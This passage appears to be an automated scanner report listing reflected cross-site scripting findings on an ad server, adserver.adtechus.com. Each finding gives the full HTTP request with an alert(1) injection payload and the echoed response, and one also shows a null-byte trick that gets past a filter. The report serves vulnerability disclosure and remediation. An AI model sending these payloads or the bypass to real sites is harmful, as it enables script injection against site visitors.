Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2745

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,9feaf"-alert(1)-"0bd34c25585http://canadianimmigrant.ca/top25\" target=\"_blank\">
...[SNIP]...

2.153. http://adserver.adtechus.com/addyn/3.0/5294.1/1352291/0/225/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5294.1/1352291/0/225/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9886c"-alert(1)-"2cd018375f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5294.1/1352291/0/225/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=699;misc=1290207937235;aduho=-360;rdclick=http://ads.olivebrandresponse.com/clk?2,13%3Bf1be6aa0e4ccecd9%3B12c66642cb2,0%3B%3B%3B2726066490,Z4UBAC2JEwBPhFcAAAAAAG.XFwAAAAAAAABMAAYAAAAAAAoAAwAGEhnHHwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAsixkZiwBAAAAAAAAAGJiYWQxOGE0LWY0MzEtMTFkZi04MjMzLTAwMzA0OGQ3MmNiZQAzmSoAAAA=,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965555%2F0%2F225%2FAdId%3D1014032%3BBnId%3D3%3Bitime%3D208027435%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,&9886c"-alert(1)-"2cd018375f0=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?Z4UBAC2JEwBPhFcAAAAAAG.XFwAAAAAAAABMAAYAAAAAAAoAAwAGEhnHHwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLIUUinOcvCb8kaJ0q61u4Sf3TvL9Pi80V0hKNAAAAAA==,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965555%2F0%2F225%2FAdId%3D1014032%3BBnId%3D3%3Bitime%3D208027435%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,Z%3D728x90%26x%3Dhttp%253A%252F%252Fadserver%252Eadtechus%252Ecom%252Fadlink%252F5214%252F965555%252F0%252F225%252FAdId%253D1014032%253BBnId%253D3%253Bitime%253D208027435%253Bkey%253D%252527%252527aee2d%255F%255F%255F%255F%255F%252Ftitle%255F%255F%255F%255F%255F%255F%255F%255F%255F%255Fscript%255F%255F%255F%255F%255Falert%25281%2529%255F%255F%255F%255F%255F%252Fscript%255F%255F%255F%255F%255FHoyt%252520LLC%252520PoC%252520XSS%25252011%252D19%252D2010%253Bnodecode%253Dyes%253Blink%253D%2524%26s%3D1280301%26_salt%3D2784839641%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.toronto.com%252FsearchResults%253Fq%253D%27%27aee2d_____%252Ftitle__________script_____alert%281%29_____%252Fscript_____Hoyt%252520LLC%252520PoC%252520XSS%25252011-19-2010%26r%3D1,bbad18a4-f431-11df-8233-003048d72cbe
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,&9886c"-alert(1)-"2cd018375f0=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adl
...[SNIP]...

2.154. http://adserver.adtechus.com/addyn/3.0/5294.1/1352321/0/170/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5294.1/1352321/0/170/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %008ab5a"-alert(1)-"a916410fe0b was submitted in the loc parameter. This input was echoed as 8ab5a"-alert(1)-"a916410fe0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5294.1/1352321/0/170/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=685;misc=1290207941511;aduho=-360;rdclick=http://ads.olivebrandresponse.com/clk?2,13%3B3ff77a17b51d6ab4%3B12c66643d5d,0%3B%3B%3B130950044,Z4UBAC2JEwBShFcAAAAAAG.XFwAAAAAAAABUAAIAAAAAAAEABAAGEhnHHwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAXT1kZiwBAAAAAAAAAGJlODY4OWRlLWY0MzEtMTFkZi05MzFhLTAwMzA0OGQ3MjAyOAAzmSoAAAA=,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F1135723%2F0%2F170%2FAdId%3D1014032%3BBnId%3D2%3Bitime%3D208031272%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,%008ab5a"-alert(1)-"a916410fe0b HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?Z4UBAC2JEwBShFcAAAAAAG.XFwAAAAAAAABUAAIAAAAAAAEABAAGEhnHHwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADKhJdvoecvCf25CFow9MwH6OdzThKykVRSmPcYAAAAAA==,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F1135723%2F0%2F170%2FAdId%3D1014032%3BBnId%3D2%3Bitime%3D208031272%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,Z%3D300x250%26x%3Dhttp%253A%252F%252Fadserver%252Eadtechus%252Ecom%252Fadlink%252F5214%252F1135723%252F0%252F170%252FAdId%253D1014032%253BBnId%253D2%253Bitime%253D208031272%253Bkey%253D%252527%252527aee2d%255F%255F%255F%255F%255F%252Ftitle%255F%255F%255F%255F%255F%255F%255F%255F%255F%255Fscript%255F%255F%255F%255F%255Falert%25281%2529%255F%255F%255F%255F%255F%252Fscript%255F%255F%255F%255F%255FHoyt%252520LLC%252520PoC%252520XSS%25252011%252D19%252D2010%253Bnodecode%253Dyes%253Blink%253D%2524%26s%3D1280301%26_salt%3D2129417328%26X%3D5735503%2C5735521%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.toronto.com%252FsearchResults%253Fq%253D%27%27aee2d_____%252Ftitle__________script_____alert%281%29_____%252Fscript_____Hoyt%252520LLC%252520PoC%252520XSS%25252011-19-2010%26r%3D1,be8689de-f431-11df-931a-003048d72028
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
odecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,%008ab5a"-alert(1)-"a916410fe0b") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlin
...[SNIP]...

2.155. http://adserver.adtechus.com/addyn/3.0/5294.1/1352321/0/170/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5294.1/1352321/0/170/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7759"-alert(1)-"ec82246e13 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5294.1/1352321/0/170/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=461;misc=1290207920599;aduho=-360;rdclick=http://ads.olivebrandresponse.com/clk?2,13%3B1639eccbf993947f%3B12c6663eb54,0%3B%3B%3B3892683711,Z4UBACACDABShFcAAAAAAG.XFwAAAAAAAABIAAIAAAAAAAEAAwAGEm6kAwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAU-tjZiwBAAAAAAAAAGIxZTBiNzM2LWY0MzEtMTFkZi1iYzdmLTAwMzA0OGQ3MWU1ZQAzmSoAAAA=,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F1135723%2F0%2F170%2FAdId%3D607818%3BBnId%3D2%3Bitime%3D208010784%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%28hoyt%2520llc%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%28hoyt%2520llc%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,b7759"-alert(1)-"ec82246e13 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?Z4UBACACDABShFcAAAAAAG.XFwAAAAAAAABIAAIAAAAAAAEAAwAGEm6kAwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADTWylTi-cvCfJcgZArudJNgkPTNF-1LIuNspjWAAAAAA==,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F1135723%2F0%2F170%2FAdId%3D607818%3BBnId%3D2%3Bitime%3D208010784%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%28hoyt%2520llc%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%28hoyt%2520llc%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,Z%3D300x250%26x%3Dhttp%253A%252F%252Fadserver%252Eadtechus%252Ecom%252Fadlink%252F5214%252F1135723%252F0%252F170%252FAdId%253D607818%253BBnId%253D2%253Bitime%253D208010784%253Bkey%253D%252527%252527aee2d%255F%255F%255F%255F%255F%252Ftitle%255F%255F%255F%255F%255F%255F%255F%255F%255F%255Fscript%255F%255F%255F%255F%255Falert%2528hoyt%252520llc%2529%255F%255F%255F%255F%255F%252Fscript%255F%255F%255F%255F%255FHoyt%252520LLC%252520PoC%252520XSS%25252011%252D19%252D2010%253Bnodecode%253Dyes%253Blink%253D%2524%26s%3D786976%26_salt%3D3307675191%26X%3D7390298%2C5735521%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.toronto.com%252FsearchResults%253Fq%253D%27%27aee2d_____%252Ftitle__________script_____alert%28hoyt%252520llc%29_____%252Fscript_____Hoyt%252520LLC%252520PoC%252520XSS%25252011-19-2010%26r%3D1,b1e0b736-f431-11df-bc7f-003048d71e5e
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%28hoyt%2520llc%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,b7759"-alert(1)-"ec82246e13") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlin
...[SNIP]...

2.156. http://adserver.adtechus.com/addyn/3.0/5294.1/1352321/0/170/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5294.1/1352321/0/170/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bae8"-alert(1)-"0dbc0ab70d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5294.1/1352321/0/170/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=685;misc=1290207941511;aduho=-360;rdclick=http://ads.olivebrandresponse.com/clk?2,13%3B3ff77a17b51d6ab4%3B12c66643d5d,0%3B%3B%3B130950044,Z4UBAC2JEwBShFcAAAAAAG.XFwAAAAAAAABUAAIAAAAAAAEABAAGEhnHHwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAXT1kZiwBAAAAAAAAAGJlODY4OWRlLWY0MzEtMTFkZi05MzFhLTAwMzA0OGQ3MjAyOAAzmSoAAAA=,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F1135723%2F0%2F170%2FAdId%3D1014032%3BBnId%3D2%3Bitime%3D208031272%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,&3bae8"-alert(1)-"0dbc0ab70d1=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?Z4UBAC2JEwBShFcAAAAAAG.XFwAAAAAAAABUAAIAAAAAAAEABAAGEhnHHwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADKhJdvoecvCf25CFow9MwH6OdzThKykVRSmPcYAAAAAA==,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F1135723%2F0%2F170%2FAdId%3D1014032%3BBnId%3D2%3Bitime%3D208031272%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,Z%3D300x250%26x%3Dhttp%253A%252F%252Fadserver%252Eadtechus%252Ecom%252Fadlink%252F5214%252F1135723%252F0%252F170%252FAdId%253D1014032%253BBnId%253D2%253Bitime%253D208031272%253Bkey%253D%252527%252527aee2d%255F%255F%255F%255F%255F%252Ftitle%255F%255F%255F%255F%255F%255F%255F%255F%255F%255Fscript%255F%255F%255F%255F%255Falert%25281%2529%255F%255F%255F%255F%255F%252Fscript%255F%255F%255F%255F%255FHoyt%252520LLC%252520PoC%252520XSS%25252011%252D19%252D2010%253Bnodecode%253Dyes%253Blink%253D%2524%26s%3D1280301%26_salt%3D2129417328%26X%3D5735503%2C5735521%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.toronto.com%252FsearchResults%253Fq%253D%27%27aee2d_____%252Ftitle__________script_____alert%281%29_____%252Fscript_____Hoyt%252520LLC%252520PoC%252520XSS%25252011-19-2010%26r%3D1,be8689de-f431-11df-931a-003048d72028
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,&3bae8"-alert(1)-"0dbc0ab70d1=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adl
...[SNIP]...

2.157. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffc1a"><script>alert(1)</script>f464e7a61d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframeffc1a"><script>alert(1)</script>f464e7a61d8/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addynffc1a"><script>alert(1)</script>f464e7a61d8/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

2.158. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6d30"><script>alert(1)</script>f1064d9662f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0a6d30"><script>alert(1)</script>f1064d9662f/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0a6d30"><script>alert(1)</script>f1064d9662f/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

2.159. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8678c"><script>alert(1)</script>510513af82c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/52358678c"><script>alert(1)</script>510513af82c/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/52358678c"><script>alert(1)</script>510513af82c/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

2.160. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33918"><script>alert(1)</script>fea0b6ed2f9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

